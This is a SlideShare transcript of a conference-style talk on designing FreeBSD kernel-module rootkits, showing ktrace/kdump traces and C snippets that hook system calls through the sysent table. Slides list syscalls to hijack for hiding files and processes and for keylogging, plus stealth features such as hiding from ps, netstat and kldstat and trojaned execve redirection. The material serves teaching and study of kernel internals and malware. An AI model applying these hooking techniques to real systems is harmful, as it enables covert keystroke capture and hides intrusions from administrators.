Your SlideShare is downloading. ×
Tripwyre
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Tripwyre

258
views

Published on

Published in: Technology, Education

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
258
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
4
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. UNIX Rootkits – Design and Implementation Satish Srinivasan sathya@freeshell.org twitter.com/tripwyre
  • 2. Overview of Presentation * Why LKM Rootkits? * Rootkit Design * How Hooking Works? * Identifying System Calls * Hijacking System Calls * Implementing System Calls * System Calls to Hijack
  • 3. Why LKM Rootkits? * Direct Access to Kernel * Monitoring actions of users * Advanced Stealth Mechanisms * Monitoring intrusions on Honeypots * Overriding OS Protections * Studying proprietary protocols * Practical Education on OS Kernels!
  • 4. Rootkit Design User User Mode Control Interface Loadable Kernel Module Driver Operating System Kernel System
  • 5. How Hooking Works? Normal Execution User Mode System Call Program Function Our Hooked System Call Hooked Execution
  • 6. Identifying System Calls Kernel Process Tracing kdump – Dump a part or all of the kernel memory to analyze the calling of system calls in the user-mode programs. ktrace - Trace the execution of the program to fnd the system calls it calls and the operations it does.
  • 7. U s i n g ktrace and kdump $ ktrace who exampleuser ttyv0 Jan 28 21:36 exampleuser ttyp0 Jan 28 21:45 (10.0.0.3) $ kdump 548 ktrace RET ktrace 0 548 ktrace CALL execve(0xbfbfe7e0,0xbfbfed2c,0xbfbfed34) 548 ktrace NAMI quot;/usr/bin/whoquot; 548 ktrace NAMI quot;/libexec/ld-elf.so.1quot; 548 who RET execve 0 548 who CALL mmap(0,0xe18,0x3,0x1000,0xffffffff,0,0,0) 548 who RET mmap 671535104/0x2806d000 548 who CALL munmap(0x2806d000,0xe18) 548 who RET munmap 0 548 who CALL __sysctl(0xbfbfead8,0x2,0x28069998,0xbfbfead4,0,0) 548 who RET __sysctl 0 548 who CALL mmap(0,0x8000,0x3,0x1002,0xffffffff,0,0,0) 548 who RET mmap 671535104/0x2806d000 548 who CALL issetugid 548 who RET issetugid 0 548 who CALL open(0x28065c28,0,0x1b6) 548 who NAMI quot;/etc/libmap.confquot; 548 who RET open -1 errno 2 No such file or directory 548 who CALL open(0x28064e80,0,0) 548 who NAMI quot;/var/run/ld-elf.so.hintsquot; 548 who RET open 3 548 who CALL read(0x3,0xbfbfeaa0,0x80) 548 who GIO fd 3 read 128 bytes
  • 8. ... 548 who RET mprotect 0 548 who CALL mmap(0,0x56c0,0x3,0x1000,0xffffffff,0,0,0) 548 who RET mmap 672452608/0x2814d000 548 who CALL munmap(0x2814d000,0x56c0) 548 who RET munmap 0 548 who CALL mprotect(0x28075000,0xc0000,0x5) 548 who RET mprotect 0 548 who CALL sigprocmask(0x1,0x28068820,0xbfbfeb20) 548 who RET sigprocmask 0 548 who CALL sigprocmask(0x3,0x28068830,0) 548 who RET sigprocmask 0 548 who CALL open(0x8049520,0,0x1b6) 548 who NAMI quot;/var/run/utmpquot; 548 who RET open 3 548 who CALL fstat(0x3,0xbfbfead0) ... 548 who RET read 748/0x2ec 548 who CALL fstat(0x1,0xbfbfe330) 548 who RET fstat 0 548 who CALL break(0x804e000) 548 who RET break 0 548 who CALL ioctl(0x1,TIOCGETA,0xbfbfe370) 548 who RET ioctl 0 548 who CALL access(0x2813318c,0x4) 548 who NAMI quot;/etc/localtimequot; 548 who RET access 0 548 who CALL open(0x2813318c,0,0) 548 who NAMI quot;/etc/localtimequot; ...
  • 9. ... 548 who CALL fstat(0x4,0xbfbfea50) 548 who RET fstat 0 548 who CALL read(0x4,0xbfbfc730,0x1f08) 548 who GIO fd 4 read 109 bytes 0x0000 545a 6966 0000 0000 0000 0000 0000 0000 |TZif............| 0x0010 0000 0000 0000 0004 0000 0004 0000 0000 |................| 0x0020 0000 0004 0000 0004 0000 000d cadb 86b0 |................| 0x0030 cc05 7118 cc95 32a8 d274 1298 0102 0302 |..q...2..t......| 0x0040 0000 52d0 0000 0000 5b68 0004 0000 4d58 |..R.....[h....MX| 0x0050 0009 0000 5b68 0109 484d 5400 4255 5254 |....[h..HMT.BURT| 0x0060 0049 5354 0000 0000 0000 0000 00 |.IST.........| 548 who RET read 109/0x6d 548 who CALL close(0x4) 548 who RET close 0 548 who CALL write(0x1,0x804d000,0x28) 548 who GIO fd 1 wrote 40 bytes quot;exampleuser ttyv0 Jan 28 21:36 quot; 548 who RET write 40/0x28 548 who CALL write(0x1,0x804d000,0x32) 548 who GIO fd 1 wrote 50 bytes quot;exampleuser ttyp0 Jan 28 21:45 (10.0.0.3) quot; 548 who RET write 50/0x32 548 who CALL read(0x3,0x804c000,0x1000) 548 who GIO fd 3 read 0 bytes quot;quot; 548 who RET read 0 548 who CALL close(0x3) 548 who RET close 0 548 who CALL exit(0)
  • 10. Hijacking System Calls #include <sys/syscall.h> #include <sys/kernel.h> #include <sys/sysent.h> #include <sys/module.h> void load (struct module *module, int cmd, void *args) { switch(cmd) { case MOD_LOAD: /* System Call Hooking; Example read() syscall. */ sysent[SYS_read].sy_call = (sys_call_t *) hooked_read; break; case MOD_UNLOAD: /* System Call Restore; Example getdirentries() syscall */ sysent[SYS_getdirentries].sy_call = (sys_call_t *) getdirentries; break; }}
  • 11. Implementing System Calls /* Example: Hooking chflags(2) */ int hooked_chflags(struct thread *td, void *syscall_args) { struct chflags_args *uap; uap = (struct chflags_args *) syscall_args; char name[NAME_MAX]; size_t size; if(copyinstr(uap->path, name, NAME_MAX, &size) == EFAULT) return(EFAULT); if(file_hidden(name)) return(ENOENT); return(chflags(td, syscall_args)); }
  • 12. System Calls To Hijack open, stat, chflags : File Hiding chmod, chown : Change ownership getdirentries : List Directories read, write, writev : Keylogging kill, fork : Process Hiding ...
  • 13. Feature List * Hide itself from kldstat(1) * Hide a port from netstat(1) * Hide fles and directories * Monitor network for ICMP messages * Capture user keystrokes * Hide a process from ps(1)
  • 14. Feature List (contd..) * execve(1) redirection for Trojan'ed binaries * Hide a user from who(1) * Controller Mechanism with Authentication using crypt(3) * AES Encryption for Keylogs
  • 15. Thank You!

×